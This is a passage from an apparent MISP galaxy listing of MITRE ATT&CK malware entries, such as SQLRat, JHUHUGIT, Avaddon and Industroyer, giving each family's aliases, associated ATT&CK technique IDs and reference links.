The tag is: misp-galaxy:mitre-malware="Adups - S0309"

Adups - S0309 is also known as:

Adups

View relationships graph

Adups - S0309 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 4749. Table References
Links
https://attack.mitre.org/software/S0309
https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html
http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534

SQLRat - S0390

[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)

The tag is: misp-galaxy:mitre-malware="SQLRat - S0390"

SQLRat - S0390 is also known as:

SQLRat

View relationships graph

SQLRat - S0390 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4750. Table References
Links
https://attack.mitre.org/software/S0390
https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

JHUHUGIT - S0044

[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="JHUHUGIT - S0044"

JHUHUGIT - S0044 is also known as:

JHUHUGIT
Trojan.Sofacy
Seduploader
JKEYSKW
Sednit
GAMEFISH
SofacyCarberp

View relationships graph

JHUHUGIT - S0044 has relationships with:

similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4751. Table References
Links
https://attack.mitre.org/software/S0044
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf
https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/

SHARPSTATS - S0450

[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)

The tag is: misp-galaxy:mitre-malware="SHARPSTATS - S0450"

SHARPSTATS - S0450 is also known as:

SHARPSTATS

View relationships graph

SHARPSTATS - S0450 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4752. Table References
Links
https://attack.mitre.org/software/S0450
https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/

ADVSTORESHELL - S0045

[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-malware="ADVSTORESHELL - S0045"

ADVSTORESHELL - S0045 is also known as:

ADVSTORESHELL
AZZY
EVILTOSS
NETUI
Sedreco

View relationships graph

ADVSTORESHELL - S0045 has relationships with:

similar: misp-galaxy:tool="EVILTOSS" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Sedreco" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 4753. Table References
Links
https://attack.mitre.org/software/S0045
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

Asacub - S0540

[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims’ bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)

The tag is: misp-galaxy:mitre-malware="Asacub - S0540"

Asacub - S0540 is also known as:

Asacub
Trojan-SMS.AndroidOS.Smaps

View relationships graph

Asacub - S0540 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 4754. Table References
Links
https://attack.mitre.org/software/S0540
https://securelist.com/the-rise-of-mobile-banker-asacub/87591/

Anchor - S0504

[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)

The tag is: misp-galaxy:mitre-malware="Anchor - S0504"

Anchor - S0504 is also known as:

Anchor
Anchor_DNS

View relationships graph

Anchor - S0504 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4755. Table References
Links
https://attack.mitre.org/software/S0504
https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30

CloudDuke - S0054

[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)

The tag is: misp-galaxy:mitre-malware="CloudDuke - S0054"

CloudDuke - S0054 is also known as:

CloudDuke
MiniDionis
CloudLook

View relationships graph

CloudDuke - S0054 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4756. Table References
Links
https://attack.mitre.org/software/S0054
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/

Exodus - S0405

[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)

The tag is: misp-galaxy:mitre-malware="Exodus - S0405"

Exodus - S0405 is also known as:

Exodus
Exodus One
Exodus Two

View relationships graph

Exodus - S0405 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4757. Table References
Links
https://attack.mitre.org/software/S0405
https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Avaddon - S0640

[Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)

The tag is: misp-galaxy:mitre-malware="Avaddon - S0640"

Avaddon - S0640 is also known as:

Avaddon

View relationships graph

Avaddon - S0640 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4758. Table References
Links
https://attack.mitre.org/software/S0640
https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/
https://arxiv.org/pdf/2102.04796.pdf

CozyCar - S0046

[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="CozyCar - S0046"

CozyCar - S0046 is also known as:

CozyCar
CozyDuke
CozyBear
Cozer
EuroAPT

View relationships graph

CozyCar - S0046 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 4759. Table References
Links
https://attack.mitre.org/software/S0046
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

ELMER - S0064

[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)

The tag is: misp-galaxy:mitre-malware="ELMER - S0064"

ELMER - S0064 is also known as:

ELMER

View relationships graph

ELMER - S0064 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4760. Table References
Links
https://attack.mitre.org/software/S0064
https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Gustuff - S0406

[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)

The tag is: misp-galaxy:mitre-malware="Gustuff - S0406"

Gustuff - S0406 is also known as:

Gustuff

View relationships graph

Gustuff - S0406 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"

Table 4761. Table References
Links
https://attack.mitre.org/software/S0406
https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

Industroyer - S0604

[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)

The tag is: misp-galaxy:mitre-malware="Industroyer - S0604"

Industroyer - S0604 is also known as:

Industroyer
CRASHOVERRIDE
Win32/Industroyer

View relationships graph

Industroyer - S0604 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
